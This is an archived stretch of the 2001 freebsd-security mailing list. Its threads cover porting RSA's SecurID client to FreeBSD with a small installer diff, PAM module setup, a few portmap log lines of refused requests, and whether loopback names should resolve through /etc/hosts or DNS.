From owner-freebsd-security Sun May 6 4:49:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns2.eltex.ru (ns2.eltex.ru [212.119.162.4]) by hub.freebsd.org (Postfix) with ESMTP id 8185C37B424 for ; Sun, 6 May 2001 04:49:44 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from eltex.ru (eltex-gw2.nw.ru [195.19.203.86] (may be forged)) by ns2.eltex.ru (8.9.3/8.9.3) with ESMTP id PAA98311 for ; Sun, 6 May 2001 15:14:24 +0400 (MSD) From: ark@eltex.ru Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by eltex.ru (8.9.3/8.9.3) with SMTP id BAA07467; Sun, 6 May 2001 01:44:56 +0400 (MSD) Received: by yaksha.eltex.ru (ssmtp TIS-0.6alpha, 19 Jan 2000); Sun, 6 May 2001 01:46:33 +0400 Received: from undisclosed-intranet-sender id xmaG15397; Sun, 6 May 01 01:46:20 +0400 Message-Id: <200105052147.BAA08093@paranoid.eltex.ru> Subject: Re: RSA SecurID Client on FreeBSD: Summary To: jrishaw@playboy.com (jamie rishaw) Date: Sun, 6 May 2001 01:47:16 +0400 (MSD) Cc: freebsd-security@FreeBSD.ORG, jamie@playboy.com Reply-To: ark@eltex.ru In-Reply-To: <20010504133228.D21698@playboy.com> from "jamie rishaw" at May 04, 2001 01:32:28 PM X-Mailer: ELM [version 2.5 PL3] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Sorry, duplicated my message by an accident. I am just curious if someone already tried that. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 6 4:49:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns2.eltex.ru (ns2.eltex.ru [212.119.162.4]) by hub.freebsd.org (Postfix) with ESMTP id 7E39437B42C for ; Sun, 6 May 2001 04:49:46 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from eltex.ru (eltex-gw2.nw.ru [195.19.203.86] (may be forged)) by ns2.eltex.ru (8.9.3/8.9.3) with ESMTP id PAA98314 for ; Sun, 6 May 2001 15:14:25 +0400 (MSD) From: ark@eltex.ru Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by eltex.ru (8.9.3/8.9.3) with SMTP id BAA07452; Sun, 6 May 2001 01:42:36 +0400 (MSD) Received: by yaksha.eltex.ru (ssmtp TIS-0.6alpha, 19 Jan 2000); Sun, 6 May 2001 01:44:13 +0400 Received: from undisclosed-intranet-sender id xmat23718; Sun, 6 May 01 01:44:07 +0400 Message-Id: <200105052145.BAA08086@paranoid.eltex.ru> Subject: Re: RSA SecurID Client on FreeBSD: Summary To: jrishaw@playboy.com (jamie rishaw) Date: Sun, 6 May 2001 01:45:00 +0400 (MSD) Cc: freebsd-security@FreeBSD.ORG, jamie@playboy.com Reply-To: ark@eltex.ru In-Reply-To: <20010504133228.D21698@playboy.com> from "jamie rishaw" at May 04, 2001 01:32:28 PM X-Mailer: ELM [version 2.5 PL3] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Hmm, why not to just re-implement it in software? Will take more time but it _is_ the proper, reliable solution, no playing with binaries etc. > I figured it out. > > I posted to the list after probably a week plus of hacking around, > and while this isn't the most elegant solution, it works. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 6 17: 0:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from leviathan.inethouston.net (216-118-21-146.pdq.net [216.118.21.146]) by hub.freebsd.org (Postfix) with ESMTP id 6804537B422 for ; Sun, 6 May 2001 17:00:39 -0700 (PDT) (envelope-from dwcjr@inethouston.net) Received: from dwcjr (DWCJR.inethouston.net [216.118.21.147]) by leviathan.inethouston.net (Postfix) with ESMTP id 2A6BA10F40F for ; Sun, 6 May 2001 19:00:44 -0500 (CDT) Message-ID: <003101c0d688$c2a58e60$931576d8@inethouston.net> From: "David W. Chapman Jr." To: Subject: pr ports/26957 and ports/26976 (pam modules) Date: Sun, 6 May 2001 19:00:43 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm posting to this list sort of as a last resort. I submitted the pr's above and the modules have been reported to work by the authors on freebsd, I just cannot figure out what I need to put in my pam.conf. they give linux examples that I tried to modify to freebsd, but bottom line was it wouldn't work. If anyone has any ideas, I would appreciate it so I could put it in the pkg-message so everyone would know how. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 6 18:39:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from leviathan.inethouston.net (216-118-21-146.pdq.net [216.118.21.146]) by hub.freebsd.org (Postfix) with ESMTP id 5030437B422 for ; Sun, 6 May 2001 18:39:21 -0700 (PDT) (envelope-from dwcjr@inethouston.net) Received: from dwcjr (DWCJR.inethouston.net [216.118.21.147]) by leviathan.inethouston.net (Postfix) with ESMTP id 3B45010F40F; Sun, 6 May 2001 20:39:26 -0500 (CDT) Message-ID: <007701c0d696$8c45d880$931576d8@inethouston.net> From: "David W. Chapman Jr." To: "Derek Ragona" Cc: References: <5.1.0.14.2.20010506191044.00a30a60@computinginnovations.com> Subject: Re: pr ports/26957 and ports/26976 (pam modules) Date: Sun, 6 May 2001 20:39:25 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0074_01C0D66C.A35F07A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0074_01C0D66C.A35F07A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable my pam.conf file is up to date, but I just can't get pam to use the = modules. I don't see any network traffic when I log in. ----- Original Message -----=20 From: Derek Ragona=20 To: David W. Chapman Jr.=20 Sent: Sunday, May 06, 2001 7:15 PM Subject: Re: pr ports/26957 and ports/26976 (pam modules) Not sure what exactly your problem is, but you need all the pam.conf = entries for the version of FreeBSD, or stuff breaks. If you upgraded, = look in /etc/upgrade for a pam.conf you can use. This has been a problem for any upgrade in the 4.X FreeBSD's, in fact = I just upgraded two servers from 4.2 to 4.3 and had some troubles that = were cured when I copied the pam.conf file from /etc/upgrade to /etc. Hope this helps. -Derek ------=_NextPart_000_0074_01C0D66C.A35F07A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
my pam.conf file is up to date, but I = just can't=20 get pam to use the modules.  I don't see any network traffic when I = log=20 in.
 
----- Original Message -----
From:=20 Derek Ragona
Sent: Sunday, May 06, 2001 7:15 = PM
Subject: Re: pr ports/26957 and = ports/26976 (pam modules)

Not = sure what=20 exactly your problem is, but you need all the pam.conf entries for the = version=20 of FreeBSD, or stuff breaks.  If you upgraded, look in = /etc/upgrade for a=20 pam.conf you can use.

This has been a problem for any upgrade = in the=20 4.X FreeBSD's, in fact I just upgraded two servers from 4.2 to 4.3 and = had=20 some troubles that were cured when I copied the pam.conf file from=20 /etc/upgrade to /etc.

Hope this=20 = helps.

        -Derek

 
------=_NextPart_000_0074_01C0D66C.A35F07A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 3:16: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id BDC4A37B422 for ; Mon, 7 May 2001 03:15:56 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 40321 invoked by uid 1000); 7 May 2001 10:14:07 -0000 Date: Mon, 7 May 2001 13:14:07 +0300 From: Peter Pentchev To: "David W. Chapman Jr." Cc: freebsd-security@freebsd.org Subject: Re: pr ports/26957 and ports/26976 (pam modules) Message-ID: <20010507131407.A39862@ringworld.oblivion.bg> Mail-Followup-To: "David W. Chapman Jr." , freebsd-security@freebsd.org References: <003101c0d688$c2a58e60$931576d8@inethouston.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <003101c0d688$c2a58e60$931576d8@inethouston.net>; from dwcjr@inethouston.net on Sun, May 06, 2001 at 07:00:43PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 06, 2001 at 07:00:43PM -0500, David W. Chapman Jr. wrote: > I'm posting to this list sort of as a last resort. I submitted the pr's > above and the modules have been reported to work by the authors on freebsd, > I just cannot figure out what I need to put in my pam.conf. they give linux > examples that I tried to modify to freebsd, but bottom line was it wouldn't > work. If anyone has any ideas, I would appreciate it so I could put it in > the pkg-message so everyone would know how. Can you see if PR bin/27153 helps any? G'luck, Peter -- This sentence contradicts itself - or rather - well, no, actually it doesn't! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 7:48:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp12.singnet.com.sg (smtp12.singnet.com.sg [165.21.6.32]) by hub.freebsd.org (Postfix) with ESMTP id 1B68237B422 for ; Mon, 7 May 2001 07:48:11 -0700 (PDT) (envelope-from support@dslglobal.net) Received: from bryan (ad202.166.104.254.magix.com.sg [202.166.104.254]) by smtp12.singnet.com.sg (8.11.2/8.11.2) with SMTP id f47ElwQ07252 for ; Mon, 7 May 2001 22:47:58 +0800 (SGT) Message-Id: <3.0.6.32.20010507230001.0107a9f0@mail.dslglobal.net> X-Sender: support@mail.dslglobal.net X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Mon, 07 May 2001 23:00:01 +0800 To: freebsd-security@freebsd.org From: Server Administrator Subject: Re: portmap attacks? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org May 8 08:29:36 classic portmap[10832]: connect from 208.220.74.5 to dump(): request from unauthorized host May 8 08:39:18 classic portmap[10908]: connect from 211.105.145.61 to dump(): request from unauthorized host May 8 11:33:24 classic portmap[12219]: connect from 209.26.30.68 to dump(): request from unauthorized host To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 9: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from leviathan.inethouston.net (216-118-21-146.pdq.net [216.118.21.146]) by hub.freebsd.org (Postfix) with ESMTP id 2031C37B422 for ; Mon, 7 May 2001 09:06:11 -0700 (PDT) (envelope-from dwcjr@inethouston.net) Received: from dwcjr (DWCJR.inethouston.net [216.118.21.147]) by leviathan.inethouston.net (Postfix) with ESMTP id 3088910F40F; Mon, 7 May 2001 11:06:13 -0500 (CDT) Message-ID: <021401c0d70f$a4e92d00$931576d8@inethouston.net> From: "David W. Chapman Jr." To: "Peter Pentchev" Cc: References: <003101c0d688$c2a58e60$931576d8@inethouston.net> <20010507131407.A39862@ringworld.oblivion.bg> Subject: Re: pr ports/26957 and ports/26976 (pam modules) Date: Mon, 7 May 2001 11:06:15 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That looks like my problem, but I don't do any programming so I'll have to wait for the fix. Thank you for pointing me towards this though. ----- Original Message ----- From: "Peter Pentchev" To: "David W. Chapman Jr." Cc: Sent: Monday, May 07, 2001 5:14 AM Subject: Re: pr ports/26957 and ports/26976 (pam modules) > Can you see if PR bin/27153 helps any? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 9:23:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 3943537B423 for ; Mon, 7 May 2001 09:23:45 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 46932 invoked by uid 1000); 7 May 2001 16:21:56 -0000 Date: Mon, 7 May 2001 19:21:56 +0300 From: Peter Pentchev To: "David W. Chapman Jr." Cc: freebsd-security@freebsd.org Subject: Re: pr ports/26957 and ports/26976 (pam modules) Message-ID: <20010507192156.I39862@ringworld.oblivion.bg> Mail-Followup-To: "David W. Chapman Jr." , freebsd-security@freebsd.org References: <003101c0d688$c2a58e60$931576d8@inethouston.net> <20010507131407.A39862@ringworld.oblivion.bg> <021401c0d70f$a4e92d00$931576d8@inethouston.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <021401c0d70f$a4e92d00$931576d8@inethouston.net>; from dwcjr@inethouston.net on Mon, May 07, 2001 at 11:06:15AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There is a patch there; can you try to recompile your login with it, and see if it helps? G'luck, Peter -- If you think this sentence is confusing, then change one pig. On Mon, May 07, 2001 at 11:06:15AM -0500, David W. Chapman Jr. wrote: > That looks like my problem, but I don't do any programming so I'll have to > wait for the fix. Thank you for pointing me towards this though. > > ----- Original Message ----- > From: "Peter Pentchev" > To: "David W. Chapman Jr." > Cc: > Sent: Monday, May 07, 2001 5:14 AM > Subject: Re: pr ports/26957 and ports/26976 (pam modules) > > > > Can you see if PR bin/27153 helps any? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 9:55:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 6F82437B50C for ; Mon, 7 May 2001 09:55:16 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GCZ5MF00.C2F; Mon, 7 May 2001 09:54:15 -0700 Message-ID: <3AF6D34C.AE6A479F@globalstar.com> Date: Mon, 07 May 2001 09:54:36 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: anderson@centtech.com, Andrew Barros , "lists@mail.ru" , freebsd-security@FreeBSD.ORG Subject: Re: reverse or not References: <65662.989052290@axl.fw.uunet.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sheldon Hearn wrote: > > On Fri, 04 May 2001 08:17:00 EST, Eric Anderson wrote: > > > I think if you have (in your /etc/host.conf) bind listed before hosts > > (meaning it will ask the dns server before looking at the hosts file), > > it would delay if the dns server doesn't have a reverse entry for > > 127.0.0.1 [...] > > From a security perspective, I'm pretty sure that hosts should NEVER > rely on any external source for resolution on the loopback network. So everyone MUST run a DNS server on localhost? That does not sound too secure either. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 10: 0:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 469DD37B422 for ; Mon, 7 May 2001 10:00:18 -0700 (PDT) (envelope-from sheldonh@uunet.co.za) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14woMm-0006G3-00; Mon, 07 May 2001 19:00:12 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id TAA29164; Mon, 7 May 2001 19:00:11 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 29020; Mon May 7 18:58:51 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.22 #1) id 14woLT-000Pib-00; Mon, 07 May 2001 18:58:51 +0200 To: "Crist Clark" Cc: anderson@centtech.com, Andrew Barros , "lists@mail.ru" , freebsd-security@freebsd.org Subject: Re: reverse or not In-reply-to: Your message of "Mon, 07 May 2001 09:54:36 MST." <3AF6D34C.AE6A479F@globalstar.com> Date: Mon, 07 May 2001 18:58:51 +0200 Message-ID: <98864.989254731@axl.fw.uunet.co.za> From: Sheldon Hearn Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote: > > From a security perspective, I'm pretty sure that hosts should NEVER > > rely on any external source for resolution on the loopback network. > > So everyone MUST run a DNS server on localhost? That does not sound too > secure either. That's not what I'm suggesting. People were talking about /etc/hosts vs DNS. I'm saying that 1) DNS servers shouldn't answer questions about the loopback network. 2) Hosts should have hostnames for the loopback network hardwired into /etc/hosts. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 11: 2:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdconspiracy.net (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 77B8D37B422 for ; Mon, 7 May 2001 11:02:29 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from wes by bsdconspiracy.net with local (Exim 3.14 #1) id 14wpKH-0002sJ-00; Mon, 07 May 2001 12:01:41 -0600 Subject: Re: reverse or not In-Reply-To: <98864.989254731@axl.fw.uunet.co.za> from Sheldon Hearn at "May 7, 2001 06:58:51 pm" To: Sheldon Hearn Date: Mon, 7 May 2001 12:01:41 -0600 (MDT) Cc: Crist Clark , anderson@centtech.com, Andrew Barros , "lists@mail.ru" , freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: From: Wes Peters Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sheldon Hearn scribed: > > On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote: > > > > From a security perspective, I'm pretty sure that hosts should NEVER > > > rely on any external source for resolution on the loopback network. > > > > So everyone MUST run a DNS server on localhost? That does not sound too > > secure either. > > That's not what I'm suggesting. People were talking about /etc/hosts vs > DNS. I'm saying that > > 1) DNS servers shouldn't answer questions about the loopback > network. > > 2) Hosts should have hostnames for the loopback network > hardwired into /etc/hosts. 3) /etc/host.conf should always have hosts listed before bind, to be sure that you get your local definitions *first*. -- Sorry, no .sig at this moment. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 11:24:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id A43AB37B423 for ; Mon, 7 May 2001 11:24:26 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GCZ9S400.031; Mon, 7 May 2001 11:24:04 -0700 Message-ID: <3AF6E858.77E9B72A@globalstar.com> Date: Mon, 07 May 2001 11:24:24 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Wes Peters Cc: Sheldon Hearn , anderson@centtech.com, Andrew Barros , "lists@mail.ru" , freebsd-security@FreeBSD.ORG Subject: Re: reverse or not References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > > Sheldon Hearn scribed: > > > > On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote: > > > > > > From a security perspective, I'm pretty sure that hosts should NEVER > > > > rely on any external source for resolution on the loopback network. > > > > > > So everyone MUST run a DNS server on localhost? That does not sound too > > > secure either. > > > > That's not what I'm suggesting. People were talking about /etc/hosts vs > > DNS. I'm saying that > > > > 1) DNS servers shouldn't answer questions about the loopback > > network. > > > > 2) Hosts should have hostnames for the loopback network > > hardwired into /etc/hosts. > > 3) /etc/host.conf should always have hosts listed before > bind, to be sure that you get your local definitions > *first*. I was thinking of applications like sendmail(8) that don't bother with the local resolver and really like to go straight to DNS. /etc/hosts and /etc/host.conf are moot. I have had "localhost" problems with sendmail in the past that were a PITA to workaround. I know there are other common apps that go straight to DNS... 'course none of them are coming to mind at the moment. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 11:42: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from mdma.playboy.com (mdma.playboy.com [216.163.140.20]) by hub.freebsd.org (Postfix) with ESMTP id 4E71E37B42C for ; Mon, 7 May 2001 11:41:58 -0700 (PDT) (envelope-from jamie@playboy.com) Received: by mdma.playboy.com (Postfix, from userid 100) id 53CB412794; Mon, 7 May 2001 13:41:47 -0500 (CDT) Date: Mon, 7 May 2001 13:41:46 -0500 From: jamie rishaw To: "Geoffrey T. Falk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: RSA SecurID Client on FreeBSD: Summary Message-ID: <20010507134146.G22195@playboy.com> References: <20010504133228.D21698@playboy.com> <200105041914.NAA10067@h-209-91-79-2.gen.cadvision.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200105041914.NAA10067@h-209-91-79-2.gen.cadvision.com>; from gtf@cirp.org on Fri, May 04, 2001 at 01:14:46PM -0600 X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, yeah, but I'm an NTP geek.. I have ntp synched on everything I touch, routers, switches, boxen.. My peer list is sickening.. But it's oh so useful. Especially during computer forensics.. Knowing that the time sequence is not off by more than +/- 0.01 seconds on everything in the network proves invaluable. jamie On Fri, May 04, 2001 at 01:14:46PM -0600, Geoffrey T. Falk wrote: > I bet you also need to have NTP set up, otherwise the token will be out > of sync with your server.. :-) > > Geoffrey > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- jamie rishaw sr. wan/unix engineer/ninja // playboy enterprises inc. opinions stated are mine, and are not necessarily those of the bunny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 11:51:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsd4.nyct.net (bsd4.nyct.net [216.139.128.6]) by hub.freebsd.org (Postfix) with ESMTP id E5E1F37B422 for ; Mon, 7 May 2001 11:51:44 -0700 (PDT) (envelope-from efutch@nyct.net) Received: from bsd1.nyct.net (efutch@bsd1.nyct.net [216.139.128.3]) by bsd4.nyct.net (8.11.3/8.11.2) with ESMTP id f47Ipc077390 for ; Mon, 7 May 2001 14:51:39 -0400 (EDT) (envelope-from efutch@nyct.net) Date: Mon, 7 May 2001 14:51:38 -0400 (EDT) From: "Eric D. Futch" To: Subject: Re: RSA SecurID Client on FreeBSD: Summary In-Reply-To: <20010504133228.D21698@playboy.com> Message-ID: <20010507145010.P60366-100000@bsd1.nyct.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I had word from someone at RSA that they have just completed a SecurID client for FreeBSD based on 4.2. They were just waiting for the changes to be made to the web site. -- Eric Futch New York Connect.Net, Ltd. efutch@nyct.net Technical Support Staff http://www.nyct.net (212) 293-2620 "Bringing New York The Internet Service It Deserves" KNYC: 07-May-01 13:51 EDT: 61.0 F (16.1 C), clear, humidity 49% On Fri, 4 May 2001, jamie rishaw wrote: >I figured it out. > > I posted to the list after probably a week plus of hacking around, >and while this isn't the most elegant solution, it works. > > I don't want to provide support, but for sake of list archives and >other peoples sanity, here are the basic steps I took: > > - Grab Linux SecurID client off of RSA site at > http://www.rsasecurity.com/download/linux/ > - Un-tar/decompress > - (Kludge) FreeBSD apparently doesnt have the linux "/bin/line" > equiv, which is what the `sdsetup` program uses. So, change > lines in sdsetup to substitute `$LINE_EXEC` (with quotes) to > anticipated response, like 'y' for 'yes' and 'n' for 'no', and > directory or pathnames as needed. > (I'll include a diff at the end of this email) > - Grab the sdconf.rec from /top/ace/.. on your SecurID server and > put it in your $CWD > - Run ./sdsetup -client > - Add a test user with shell /top/ace/prog/sdshell > - Add this box to your ACE/Server as a client and add user auth > as you would any other new client > - Verify, run, go. > > You need to be running Linux compatibility. > > I make no guarantees or warranties whatsoever; I am relaying how >*I* got it to work on systems here. If you do it and lock yourself >out of your own boxes, don't come running to me. This only protects >interactive login, I still have yet to tackle FTP, SCP, etc. > > Good luck > >jamie > > >-- begin diff -- >103,109d102 >< if [ ! -f "$LINE_EXEC" ] >< then >< echo "#!/bin/sh" > /bin/line >< echo "read i" >> /bin/line >< echo "echo \$i" >> /bin/line >< chmod 555 /bin/line >< fi >207c200 >< YESORNO=`$LINE_EXEC` >--- >> YESORNO='y' >1114c1107 >< create=`$LINE_EXEC` >--- >> create='y' >1188c1181 >< input=`$LINE_EXEC` >--- >> input='' >1281c1274 >< test_owner=`$LINE_EXEC` >--- >> test_owner=rsa >1316c1309 >< current_platform=`$LINE_EXEC` >--- >> current_platform=freebsd >1468c1461 >< test_type=`$LINE_EXEC` >--- >> test_type=des >1508c1501 >< test_path=`$LINE_EXEC` >--- >> test_path=/usr/local/rsa >1631c1624 >< create=`$LINE_EXEC` >--- >> create='' > >-- end diff -- > > >On Fri, May 04, 2001 at 11:56:03AM -0500, jamie rishaw wrote: >> Hi, >> >> I'm looking to chat either on- or off-list with people that have >> successfully integrated RSA's SecurID into FreeBSD. Specifically, >> the client side. >> >> There are no official clients, and when I try to compile commercial >> SSH with SecurID support, I get "File format not recognized" when the >> ssh daemon tries to link sdiclient.a symbols (sdiclient.a being the >> file that the ACE server generates/holds for clients to link in and >> talk/authenticate with). SSH.com has still yet to reply to my open >> ticket with them... >> >> I have searched high and low for real answers, yet I cannot find >> anyone that's been able to say, "Yes, I've done it, here's how". >> >> URLs, Pointers, etc., are all appreciated. >> >> thanks in advance, >> >> jamie >> -- >> jamie rishaw >> sr. wan/unix engineer/ninja // playboy enterprises inc. >> opinions stated are mine, and are not necessarily those of the bunny. >> > >-- >jamie rishaw >sr. wan/unix engineer/ninja // playboy enterprises inc. >opinions stated are mine, and are not necessarily those of the bunny. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 11:55:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mdma.playboy.com (mdma.playboy.com [216.163.140.20]) by hub.freebsd.org (Postfix) with ESMTP id 4ED7D37B423 for ; Mon, 7 May 2001 11:55:20 -0700 (PDT) (envelope-from jamie@playboy.com) Received: by mdma.playboy.com (Postfix, from userid 100) id A035312794; Mon, 7 May 2001 13:55:15 -0500 (CDT) Date: Mon, 7 May 2001 13:55:15 -0500 From: jamie rishaw To: "Eric D. Futch" Cc: 